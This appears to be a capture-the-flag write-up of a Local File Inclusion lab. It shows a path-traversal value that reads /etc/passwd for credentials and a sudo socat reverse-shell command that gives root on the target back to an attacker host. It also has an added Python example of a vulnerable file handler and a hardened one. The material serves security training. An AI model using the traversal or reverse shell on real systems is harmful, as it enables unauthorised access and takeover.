Local File Inclusion
--
An awesome room for a basic understanding of Local File Inclusion.
This will be a quick write-up, so let’s get started..
ENUMERATION:-
Ports 80 and 22 are clearly open. Browsing to port 80, there are various articles which are worth a read.
Okay, so after opening one of them (say LFI-attack), there is a strange query in the URL: ?name=lfiattack
This indicates that the website is including content from somewhere else based on that parameter, which points us towards a Local File Inclusion attack.
Well, LFI attacks happen when the input is not sanitised properly.
We saw in the nmap results that port 22 is open, so in the URL replace name=lfiattack with name=../../../../../etc/passwd
Each ../ goes up one directory, so we end up at the root directory and read /etc/passwd from there.
Hit Ctrl+U and you’ll find the content in a nice format, along with nice credentials at the end!!!! ;-)
Go back to the machine and ssh to falconfeast.
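An added example (not part of the original write-up, and not the room's actual server code): the kind of handler that produces the behaviour seen above, next to a hardened version that canonicalises the path and rejects anything outside the article directory. The function names and the articles directory are assumptions.

```python
import os
import tempfile

def read_article_unsafe(base_dir, name):
    # Vulnerable pattern: the ?name= value is joined into a path unchecked,
    # so "../" sequences walk out of base_dir.
    with open(os.path.join(base_dir, name)) as fh:
        return fh.read()

def resolve_article(base_dir, name):
    # Canonicalise first (collapses "..", follows symlinks), then require
    # the result to still be inside base_dir.
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, candidate]) != base or candidate == base:
        raise PermissionError("path escapes article directory: %r" % name)
    return candidate

def read_article_safe(base_dir, name):
    with open(resolve_article(base_dir, name)) as fh:
        return fh.read()

def demo():
    # Constructed sample tree: one article inside the served directory,
    # one file that sits outside it.
    with tempfile.TemporaryDirectory() as root:
        base = os.path.join(root, "articles")
        os.mkdir(base)
        with open(os.path.join(base, "lfiattack"), "w") as fh:
            fh.write("article body")
        with open(os.path.join(root, "outside.txt"), "w") as fh:
            fh.write("outside the article directory")
        leaked = read_article_unsafe(base, "../outside.txt")
        served = read_article_safe(base, "lfiattack")
        try:
            read_article_safe(base, "../outside.txt")
            blocked = False
        except PermissionError:
            blocked = True
        return leaked, served, blocked

if __name__ == "__main__":
    print(demo())
```

An absolute value such as /etc/passwd is rejected by the same check, because os.path.join discards the base when the second argument is absolute and the resolved path then falls outside it.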
Look around and you’ll get your first flag.
PRIVILEGE ESCALATION
By checking the current sudo privileges, there’s nice socat sudo access :-)
We’ll now set up the connection to the remote machine, i.e. our machine.
Run this on the attacker machine:
socat file:`tty`,raw,echo=0 tcp-listen:1234
and on falcon run this:
sudo socat tcp-connect:<your_ip>:1234 exec:bash,pty,stderr,setsid,sigint,sane
YES!!! Got root access!! Look around and answer the second question asked.
That’s all for now!!
Until next time,
Stay Humble always!!